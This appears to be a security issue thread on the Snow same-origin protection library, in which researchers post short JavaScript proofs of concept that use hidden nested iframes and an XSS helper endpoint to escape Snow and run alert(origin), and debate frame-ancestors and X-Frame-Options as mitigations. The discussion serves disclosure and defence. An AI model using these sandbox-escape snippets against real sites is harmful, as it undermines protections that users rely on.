Bypass via nested same-origin iframe

[NDevTK]

f=document.createElement('iframe');
f.hidden = true;
f.src='https://terjanq.me/xss.php?html=%3Ciframe%20src=%22'+ location.origin + '%22%3E';
f.onload = () => {
 f.contentWindow[0].alert(window.origin);
}
document.body.appendChild(f);

[NDevTK]

Fix seems to be block cross-origin contentWindow only allowing what is known to be safe.
It should not be expected that all pages on an origin will contain embed protection or the SNOW script.
For example an image, https://www.google.com/favicon.ico (Does this mean Google has a security issue?... no)

[weizman]

In a world where:

• JS runtime protections tools are popular;
• Google uses such a tool (call it X);
• Naturally, X is vulnerable to the same origin problem Snow protects against;

Then the answer to the question "Does this mean Google has a security issue?" is in fact YES.

And the context of this project is around assuming a potential user of Snow wants to protect themselves against this class of issues, so again, this is a security issue.

To be clear, in the world I describe, Google are expected to serve google.com/favicon.ico with an X-Frame-Options: SAMEORIGIN or 'Content-Security-Policy': 'frame-ancestors "none";' because there isn't a legitimate reason to frame a non-framable resource - only malicious reasons.

In MetaMask, currently being the main adopter of Snow, we take these issues seriously, which is why you can't frame anything under the MetaMask origin, including favicon.icos.

That being said, this isn't ideal. I would obviously prefer a better solution that requires less responsibility from the adopter. This is why we wish to end up in a place where we convince browsers to help out with some builtin solutions.

But for now, I agree encouraging the adopter to set a Content-Security-Policy': 'frame-ancestors "trusted.com"; when integrating Snow is a good thing to do. To me that is a fair action-item.

[NDevTK]

Yeah for the browser extension I see you got "content_security_policy": "frame-ancestors 'none'; script-src 'self'; object-src 'self'"
This is better then using WAR which I think is only initiator based.

Regarding the https://metamask.io origin:

f=document.createElement('iframe');
f.src='https://metamask.io/favicon-32x32.png';
document.body.appendChild(f);

Does work :)

I agree with encouraging the adopter to set a Content-Security-Policy': 'frame-ancestors "trusted.com"; in all cases.
It looks bad when your demo can be escaped.

[terjanq]

To be clear, in the world I describe, Google are expected to serve google.com/favicon.ico with an X-Frame-Options: SAMEORIGIN or 'Content-Security-Policy': 'frame-ancestors "none";' because there isn't a legitimate reason to frame a non-framable resource - only malicious reasons.

This is an unrealistic assumption. There will be always plenty of endpoints with either missing the headers or the ones that are purposefully frameable. Even with that assumption, the below bypass works fine with both X-Frame-Options: SAMEORIGIN and Content-Security-Policy: frame-ancestors 'none' set at the same time.

f=document.createElement('iframe');
f.hidden = true;
f.src='https://terjanq.me/xss.php?html=<iframe>';
f.onload = () => {
 f.contentWindow[0].location='about:blank';
 setTimeout(()=>{
   f.contentWindow[0].alert(origin);
 }, 500);
}
document.body.appendChild(f);